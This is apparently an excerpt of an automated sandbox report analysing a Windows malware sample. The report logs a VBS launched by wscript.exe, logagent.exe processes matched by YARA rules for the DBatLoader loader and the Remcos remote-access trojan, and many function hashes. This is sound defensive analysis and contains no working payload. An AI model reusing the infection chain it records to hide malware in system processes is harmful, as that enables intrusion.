File size:	1133568 bytes
MD5 hash:	CF98D2D4D4555323842C8371DB09347E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000027.00000002.512103234.0000000002493000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: wscript.exe PID: 1648 Parent PID: 5572

General

Start time:	21:35:41
Start date:	21/09/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\jfkmakxyobknneldgfgnljvaswd.vbs'
Imagebase:	0x200000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: logagent.exe PID: 3360 Parent PID: 6172

General

Start time:	21:35:57
Start date:	21/09/2021
Path:	C:\Windows\SysWOW64\logagent.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\logagent.exe
Imagebase:	0x320000
File size:	86016 bytes
MD5 hash:	E2036AC444AB4AD91EECC1A80FF7212F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000002C.00000002.500969546.0000000000250000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000002C.00000002.500969546.0000000000250000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000002C.00000002.512423123.0000000010590000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000002C.00000002.512423123.0000000010590000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000002C.00000002.509224017.0000000002748000.00000004.00000020.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: powershell.exe PID: 6584 Parent PID: 6344 powershell.exeCOMMON

Executed Functions

Function 082E8C60, Relevance: .7, Instructions: 693COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334b49ab165f8dcb392715d7b40c8eeeb1c177aac3e9e0bf0e61e245e9f136d2
Instruction ID: d8716c84f512b10401b6f5f0869e8cfafb1e85024bd7bbb8bacc0728b1b05ad5
Opcode Fuzzy Hash: 334b49ab165f8dcb392715d7b40c8eeeb1c177aac3e9e0bf0e61e245e9f136d2
Instruction Fuzzy Hash: 3D527F74610219DFDB24DF38C850BAE77B2AF89309F5085AEE909AB390DB35DC81CB55

Uniqueness

Uniqueness Score: -1.00%

Function 07B08710, Relevance: 5.5, Strings: 4, Instructions: 452COMMON

Download Yara Rule

Strings

/, xrefs: 07B08C2A
[h_^, xrefs: 07B08C0A
{h_^, xrefs: 07B08A4F
kh_^, xrefs: 07B08B4F

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID: /$[h_^$kh_^${h_^
API String ID: 0-3228016038
Opcode ID: 3f8b28b76f62761635cd0b3d0d871b307aade5367182e7120c513d2f253d8657
Instruction ID: 6abe27ccb6b586ec58374d157b2a13c1d0b28c282aaf1be232d0aff39b18a33a
Opcode Fuzzy Hash: 3f8b28b76f62761635cd0b3d0d871b307aade5367182e7120c513d2f253d8657
Instruction Fuzzy Hash: 41F1A0F07002069FEB14DF64D49466E7BE6EF84608B1485AAE106DF394EF75DE028BD1

Uniqueness

Uniqueness Score: -1.00%

Function 07B07330, Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10cc5fbf6c62f2c876493e0e666dceba4a6671f882df8359c6fd436cb88f158a
Instruction ID: 4e7794152c1722440bb0792e714afc765db88c7d9111fc6034b2d9771a115f50
Opcode Fuzzy Hash: 10cc5fbf6c62f2c876493e0e666dceba4a6671f882df8359c6fd436cb88f158a
Instruction Fuzzy Hash: FBA1D1B47002158FEB149B38889467EBBE2EF85318F2586AAD5168F3D1DF70DC4287D2

Uniqueness

Uniqueness Score: -1.00%

Function 082E4CF7, Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48886d52a89524cf8af6c7e1881e1f76c38f9a946ab2299fa92423ab2615b45b
Instruction ID: 6b8c9c8a0ae27274454e2047375626ea3470703524566e939cc60e9e311b768c
Opcode Fuzzy Hash: 48886d52a89524cf8af6c7e1881e1f76c38f9a946ab2299fa92423ab2615b45b
Instruction Fuzzy Hash: 91518634B001199FEB15DFA4DC14BAEB7F7EB8C704F208129E609AB394DB359D118B96

Uniqueness

Uniqueness Score: -1.00%

Function 082E77F1, Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b3231d60ada2a083e9be873777743cfae08db377b3837bbb0d66770755b210
Instruction ID: dbfc4192f104284927fcb32f94acbd5f76def8caadca2b4fb81ad6f7e3314085
Opcode Fuzzy Hash: c1b3231d60ada2a083e9be873777743cfae08db377b3837bbb0d66770755b210
Instruction Fuzzy Hash: F1711835A01215CFEB24DF64D844BAAB7B6FF88311F1581A9E909AB390DB359D41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07B0FCE0, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4d3e5015afaa574e8c702fdee55be5b09bc8314a3bc326f78c3eaf394d79c84
Instruction ID: 349353ee9fa22460a623c18a12eb377ad5454ae54c7104203a197a94867d990a
Opcode Fuzzy Hash: b4d3e5015afaa574e8c702fdee55be5b09bc8314a3bc326f78c3eaf394d79c84
Instruction Fuzzy Hash: CD41CFB57042059FDB24AB74E8156BE7FB6EF89214F1044BAD502EB390CB359C02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 07B07F50, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa118ca6e5d1ea929942c7d7d8266fadd828bd8c5f87a6f98304793831c791af
Instruction ID: 04858f1b7b0fe5315ecda6a756aac8184d0366045f014b944e20f98be2864fb1
Opcode Fuzzy Hash: aa118ca6e5d1ea929942c7d7d8266fadd828bd8c5f87a6f98304793831c791af
Instruction Fuzzy Hash: 54316175B002158FEB45DF68D890AAEBBF2FF88314F11816AE409DB391DB31DD018B91

Uniqueness

Uniqueness Score: -1.00%

Function 07B0FCD0, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5222ea4dbbaf50d6cd3f356722fcaa3c0433e290c58758ed1758810f36bac14
Instruction ID: 8c8a87de6f0f87b20fa391c4552472e56362deef3a9e64e573fbb685bc0f3d0c
Opcode Fuzzy Hash: e5222ea4dbbaf50d6cd3f356722fcaa3c0433e290c58758ed1758810f36bac14
Instruction Fuzzy Hash: 8831F0B07053459FDB25AB74D9186B97FF6EF49201F0444A9D402EB2A1DB398C46CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 082E7190, Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e93cb47dba2e05b1c9ba6fc827c426cdd962878eee9e0e20af390869d409759e
Instruction ID: 6e5a9640f59e8b2f06d1e00d12784d9616b8cfea0650e955c29fea19b0a7dfd3
Opcode Fuzzy Hash: e93cb47dba2e05b1c9ba6fc827c426cdd962878eee9e0e20af390869d409759e
Instruction Fuzzy Hash: 59418C78E002099FDB14DFB8D890AAEBBB2FF84305F60892AD5056B340DF34A941CF65

Uniqueness

Uniqueness Score: -1.00%

Function 082E6068, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 205ae36f71533224089275e21a297b6e725d14db46d4cbddf14bb9c2117fc069
Instruction ID: 11ca19421d7a993f302a9a069214a539a902d01f5fade8553e46fd96ce91cdb6
Opcode Fuzzy Hash: 205ae36f71533224089275e21a297b6e725d14db46d4cbddf14bb9c2117fc069
Instruction Fuzzy Hash: 5031AF797002018FD755DBA8D894ABE77A7EB88301F148539DA05DB355EF319D02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07B07F60, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 689ada0589d1ae0a869567856225bd9370f681a081dd059c2b9cc55f3179a0ce
Instruction ID: 843d8aed08c06c40e8910b80efc9ea805ba43ae31aebea0daa1b0950281caf50
Opcode Fuzzy Hash: 689ada0589d1ae0a869567856225bd9370f681a081dd059c2b9cc55f3179a0ce
Instruction Fuzzy Hash: 53311EB5B001098FEB44DF69D894AAEBBF6FB88314F118169D509DB390DB31ED018B91

Uniqueness

Uniqueness Score: -1.00%

Function 07B0FC08, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 620201bf3d104e3d8fdbcb14801fa8dc8486f98a46d45ba78a26e3ff3b09f3f8
Instruction ID: 6a38000a7a7946fbb170a622500c03a0b19934f3a6556f7102c061d93526daef
Opcode Fuzzy Hash: 620201bf3d104e3d8fdbcb14801fa8dc8486f98a46d45ba78a26e3ff3b09f3f8
Instruction Fuzzy Hash: D12132342093944FD316EB78A4144AA7FE6DF4A11470688AFD048CF252DB2A9C4ACBD3

Uniqueness

Uniqueness Score: -1.00%

Function 07B0F0A8, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a75e64edace1e148f97f2a6fb2970e88407bb6df4476c25302c52475129a1c83
Instruction ID: d77390615d4750664b5c733dadbfe7fa9b0d6121892c80bce5f20a98f364e36c
Opcode Fuzzy Hash: a75e64edace1e148f97f2a6fb2970e88407bb6df4476c25302c52475129a1c83
Instruction Fuzzy Hash: C5117CB1B006199BEB19DF69D8406EEBBF2AF8C310F14816AD505BB380DF759D45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 07B07EA8, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34d154f4cd468c7e0294075e076c42b0e0bc1e56cae88b0ef138df661a535b29
Instruction ID: ac48f0878f5dee48cca2c573f1adae794a7552481c12c06b0f0f2dc02c29023c
Opcode Fuzzy Hash: 34d154f4cd468c7e0294075e076c42b0e0bc1e56cae88b0ef138df661a535b29
Instruction Fuzzy Hash: 6611C178B012125FE711DB69D8509EFBBA1EF85214F0444BAD9049F385DB3099118BA1

Uniqueness

Uniqueness Score: -1.00%

Function 07B07EB8, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52768bc68f96b029b577645d0abba564a65b7d83bac9aadf7dde80fe7dd5661b
Instruction ID: 175a1dfd54dd3afeef4175b9cd66e767c76ff88fb9e738be3449dbbd8df38e1e
Opcode Fuzzy Hash: 52768bc68f96b029b577645d0abba564a65b7d83bac9aadf7dde80fe7dd5661b
Instruction Fuzzy Hash: 9301C078B013169FEB10DE69D8509EFB7A5EF85264F104979E908AF344EF30ED118BA1

Uniqueness

Uniqueness Score: -1.00%

Function 07B07DC8, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9666e7928423b341ce53d5002e107f4fbe7106b0b01fc84ebedf5b7b2da1b0db
Instruction ID: fcce5f8f0a895b45fa743b11f7994537e11b28f16b86f76ef9d46fc743b95752
Opcode Fuzzy Hash: 9666e7928423b341ce53d5002e107f4fbe7106b0b01fc84ebedf5b7b2da1b0db
Instruction Fuzzy Hash: D2F050657093941FE70A95741C655FB17D39BC907870881BBE101CF381DE348C0543D1

Uniqueness

Uniqueness Score: -1.00%

Function 082E4C98, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d118e81c08f904739ae02340a9e27af662cba62bb18115cd962b88ee47641571
Instruction ID: 7f545cc37ac098a33e770fed05e888095d372d627856f1481bdbc357dc42cc92
Opcode Fuzzy Hash: d118e81c08f904739ae02340a9e27af662cba62bb18115cd962b88ee47641571
Instruction Fuzzy Hash: 85F0E23671021897DB15A67898995ED37BAEBC9222B054039D807D7B00DE79CC03C791

Uniqueness

Uniqueness Score: -1.00%

Function 082E576A, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e02d7391e3141b63b9e86236fc0ae4ac5b309be894f357999d20d660c4d62228
Instruction ID: 792c0c2a519e80b0a169694fdcb6c3bbac122ffa30bd9b78b56653bb0da78b7c
Opcode Fuzzy Hash: e02d7391e3141b63b9e86236fc0ae4ac5b309be894f357999d20d660c4d62228
Instruction Fuzzy Hash: 67F04432001249AFDF429FA4EC41CEA3FA6FF0D299B058542FA485A521C232E861EF91

Uniqueness

Uniqueness Score: -1.00%

Function 082E5710, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28a587b3ec6278c4a19eac1278837982e0129fcc9914afa2fcbd529037587bd1
Instruction ID: b20e986d83114f969ab393a15cf0bfa9462afe312f8f3979bd2453720e5152f3
Opcode Fuzzy Hash: 28a587b3ec6278c4a19eac1278837982e0129fcc9914afa2fcbd529037587bd1
Instruction Fuzzy Hash: EFF0CF32100259BBCF529E85DD00CDE3FB6FF8C658B459619FA4856120C672D860EB90

Uniqueness

Uniqueness Score: -1.00%

Function 07B08701, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2745517265534120c12ed7cebf4d3be72f5b55984d4350a9c6e66f72095e91
Instruction ID: d5c3ffdaf46cdb761cc4ef5533ed5ca8c2982e89941073178f012a0bc854d7ed
Opcode Fuzzy Hash: 1e2745517265534120c12ed7cebf4d3be72f5b55984d4350a9c6e66f72095e91
Instruction Fuzzy Hash: F2F0A775E052048BEB109F7DA80429FBFB4DB86650F0440B6C009C7245EA788A1647E1

Uniqueness

Uniqueness Score: -1.00%

Function 082E4CA8, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f283b87980c5e42930c28d318cabc1f15fa9f536136222740be488f0f1c5c2a
Instruction ID: 20d0f7b88a6048e399429efeca1cd2ae697dece3dc0b7134efdbc87e3a38ed21
Opcode Fuzzy Hash: 4f283b87980c5e42930c28d318cabc1f15fa9f536136222740be488f0f1c5c2a
Instruction Fuzzy Hash: 8DE0E53671021897CB186668D8084EE77BAEBC8211B04007DD902E3700CF79DC05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07B0F5A0, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8463dfd488b08196d81a903e864f41ccd123ec707d0389ab7f47b3ffd5771355
Instruction ID: 10a144b96452d0e8db26d96aacced650e5da08eefe10e47c772f71971d0a092b
Opcode Fuzzy Hash: 8463dfd488b08196d81a903e864f41ccd123ec707d0389ab7f47b3ffd5771355
Instruction Fuzzy Hash: C9F037B6104298BFDB028E54EC128F57FA5EB46114B4480C7FD558B593C637D623D7E1

Uniqueness

Uniqueness Score: -1.00%

Function 07B0F629, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd4c209a17d15179d5d8a2cebf87cabedd3a1d9a1913be3ae56ff21ee7fa022b
Instruction ID: f3a3e81fba35d4d5440d665aa19d44d0ae8ceecec1c7ce3cf10714e17b373d0a
Opcode Fuzzy Hash: cd4c209a17d15179d5d8a2cebf87cabedd3a1d9a1913be3ae56ff21ee7fa022b
Instruction Fuzzy Hash: 60F027362063599FC701DF64D4C04DD37B1EF82228344C557E4449F211C7B0A90DCBE2

Uniqueness

Uniqueness Score: -1.00%

Function 082EFD86, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f257f82e5897744372b5dba1986403777c2870ea531e47d3bc63f2ae228abe23
Instruction ID: 0178ff657de38d0bba37ea1bf3e0a27cc3bcdc842fefa4e1944028799404f7c5
Opcode Fuzzy Hash: f257f82e5897744372b5dba1986403777c2870ea531e47d3bc63f2ae228abe23
Instruction Fuzzy Hash: 43F03934741214AFEB11DBA4E859BED7BB2EF86716F5040A9E2056B2E1CB356811CB10

Uniqueness

Uniqueness Score: -1.00%

Function 07B0F638, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23de8959b3b5841c205949e5bf267f4bcdd2ab047c91ecc4271fda158db9e7c8
Instruction ID: 3052baa413a294cb08d95613391e4ab43e2f302e889820606067bedef2f1d723
Opcode Fuzzy Hash: 23de8959b3b5841c205949e5bf267f4bcdd2ab047c91ecc4271fda158db9e7c8
Instruction Fuzzy Hash: 9AE04F72601219AB9B10DF5AE4C0CDE77E9FFC5668780C526E5099F304DBB0F91987E2

Uniqueness

Uniqueness Score: -1.00%

Function 082E8152, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b10a5b299640b6bdc3d3e6ce778c1cf1fa9c5153250ea00d1c55247ed7e38210
Instruction ID: 24a1ea2b092bbdf5da84b144a2d48cd5bb863424c1ef19eba6c45d2c2f93c127
Opcode Fuzzy Hash: b10a5b299640b6bdc3d3e6ce778c1cf1fa9c5153250ea00d1c55247ed7e38210
Instruction Fuzzy Hash: 82E02B75A05245AFE701DF74D99019D77B1EF85304F0144EDC444AF241CB301E118711

Uniqueness

Uniqueness Score: -1.00%

Function 082E6038, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 100bcd35fa81550045910e66cca8e8b1cde1aa66fcb4e564ac0b732449ee11a8
Instruction ID: 62dfad297f67f4cbd11ef9efedf5a7f7ba9080d2fd753ff8b17d1e4b4568d4d2
Opcode Fuzzy Hash: 100bcd35fa81550045910e66cca8e8b1cde1aa66fcb4e564ac0b732449ee11a8
Instruction Fuzzy Hash: 98D05B71B001196BCB559A55D4054DE7FFAEB54121B1040A9E405D3240EF759511C644

Uniqueness

Uniqueness Score: -1.00%

Function 082E8160, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 579e3079c0190bb899d0c75bfff527aa50e49a8ffaa5fa71b535f142cb663734
Instruction ID: 164981fdf00760b31176da9d41ea8d84557f231907c2bfd9e2b52e257083abd6
Opcode Fuzzy Hash: 579e3079c0190bb899d0c75bfff527aa50e49a8ffaa5fa71b535f142cb663734
Instruction Fuzzy Hash: 48E08674A01208AFDB04DFB4E9106ADB7F6DB85304F1044BDC909AF340DF315E108762

Uniqueness

Uniqueness Score: -1.00%

Function 07B0FCA1, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2735cb95b4b62f42302090d9c866a8440b69c234febc6b383dbcedae6ad9db3b
Instruction ID: 66afc079f09032296c4fc9413e7db3c1658474115961ca6bb86999422f08580a
Opcode Fuzzy Hash: 2735cb95b4b62f42302090d9c866a8440b69c234febc6b383dbcedae6ad9db3b
Instruction Fuzzy Hash: 87D0A91264E3E00FDB4332B078225C16FE0864A05230A88E6D404C3263E11E8C0B9BC6

Uniqueness

Uniqueness Score: -1.00%

Function 07B0F5B0, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65b382f2b373dd0e42861b0c7a885679bbca07c8995822aa41ad6b5fde29ea02
Instruction ID: 2f1addc7ac752b055209e5a892d08ee60b8d95dd5987d24a20b0db1062a2c8ce
Opcode Fuzzy Hash: 65b382f2b373dd0e42861b0c7a885679bbca07c8995822aa41ad6b5fde29ea02
Instruction Fuzzy Hash: CFD06736104249AF8B01CE84D951C6A7F6AEB49214B14C049BE5946262C633E932EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 082EF7F0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321708448.00000000082E0000.00000040.00000001.sdmp, Offset: 082E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08781c510bf0be8d671f342b2fc03e7ab5eb792e23cb54a312ce3cd20ac3214e
Instruction ID: 75fbbd34e926814ba5004607ef43a7ce57eafaacc17c27b307d52636377c87c9
Opcode Fuzzy Hash: 08781c510bf0be8d671f342b2fc03e7ab5eb792e23cb54a312ce3cd20ac3214e
Instruction Fuzzy Hash: 90C0929080F2C09EEB2277F0A93E0587F309F83306B4800C6A0E1960F3CE2E414CE7A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07B09EA0, Relevance: 8.1, Strings: 3, Instructions: 4336COMMON

Download Yara Rule

Strings

@ Mf, xrefs: 07B09EC9
@ Mf, xrefs: 07B0CC18
@ Mf, xrefs: 07B09F3A

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID: @ Mf$@ Mf$@ Mf
API String ID: 0-3656152991
Opcode ID: aeb58cd4e845edcdc2f1a815e2866ed84184494a3a643809e7d3f9fd8dcc7d89
Instruction ID: 1e008ca1416b18dcad7daa48ba852cd7fd8bedbd06555d179cd8f61a225128a3
Opcode Fuzzy Hash: aeb58cd4e845edcdc2f1a815e2866ed84184494a3a643809e7d3f9fd8dcc7d89
Instruction Fuzzy Hash: 2DA31E74A012199FEB25DF60C854BEE77F2EB88348F1045E9920D6F290DB35AE91CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07B09EB0, Relevance: 8.1, Strings: 3, Instructions: 4326COMMON

Download Yara Rule

Strings

@ Mf, xrefs: 07B09EC9
@ Mf, xrefs: 07B0CC18
@ Mf, xrefs: 07B09F3A

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID: @ Mf$@ Mf$@ Mf
API String ID: 0-3656152991
Opcode ID: 331f4d3e3fc14b580e5006892a50c1f43a4ea1989bd4b41a5e88b19285abecd8
Instruction ID: f30cf82eb0143421d492fa9f4142917cc7ab973e3651a4b3c0c2a4c5c6e4a131
Opcode Fuzzy Hash: 331f4d3e3fc14b580e5006892a50c1f43a4ea1989bd4b41a5e88b19285abecd8
Instruction Fuzzy Hash: 5BA31E74A012199FEB25DF60C854BEE77F2EB88348F1045E9920D6F290DB35AE91CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07B03368, Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74a37709c8489c10aee95e96b549ca3413f64e7b78ba954d2540e27cac77b98
Instruction ID: acebd4a81f23aaace4b6ff2f98dc4dec0efb627d3a3a6e0ec5797d260fa18173
Opcode Fuzzy Hash: c74a37709c8489c10aee95e96b549ca3413f64e7b78ba954d2540e27cac77b98
Instruction Fuzzy Hash: 9842AD34A00219CFEB25DF64CC10BADB7B2EF89304F1085AAE5097B391DB75AD91CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07B08D80, Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ca061e5ad7c936d07e9cc8ced3e52dc786880a90d22d2216bacc9d0dce74a71
Instruction ID: 9b3907fe4b873285d5f25b38bcd01a81114b3dd7097b999bf1f10bf6a89d8dc4
Opcode Fuzzy Hash: 5ca061e5ad7c936d07e9cc8ced3e52dc786880a90d22d2216bacc9d0dce74a71
Instruction Fuzzy Hash: D122FC78A003588FEB54EFA4D454BAEB7F2EF88308F1045B9D109AF354DB359A458F92

Uniqueness

Uniqueness Score: -1.00%

Function 07B08D90, Relevance: .5, Instructions: 491COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7953502f305f09b35ec6770d840207f37b9112f5000a168d89f386b8064f1d8c
Instruction ID: cc02a5f064f85437d180dee77136a80c7b37584b5e8a49ac3a0ff8431f731348
Opcode Fuzzy Hash: 7953502f305f09b35ec6770d840207f37b9112f5000a168d89f386b8064f1d8c
Instruction Fuzzy Hash: 8A22FD78A003588FEB54EFA4D454BAEB7F2EF88308F1045B9D109AF354DB359A458F92

Uniqueness

Uniqueness Score: -1.00%

Function 07B03358, Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.321279549.0000000007B00000.00000040.00000001.sdmp, Offset: 07B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4156b3926e92e366dcd820864383283ed5f9e3558f40ab7125ed06f3a85bee89
Instruction ID: 00eeffa6eb55c286aa86d608360ed24e3266ec1949a84e3cbe4dab135055586d
Opcode Fuzzy Hash: 4156b3926e92e366dcd820864383283ed5f9e3558f40ab7125ed06f3a85bee89
Instruction Fuzzy Hash: 88E1AE34B006198FEB25DF64C850BADB3B2EF89304F1081AAE5097B395DF719D918BA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: logagent.exe PID: 5572 Parent PID: 6536 logagent.exeCOMMON

Executed Functions

Function 0040CD09, Relevance: 84.1, APIs: 28, Strings: 20, Instructions: 98
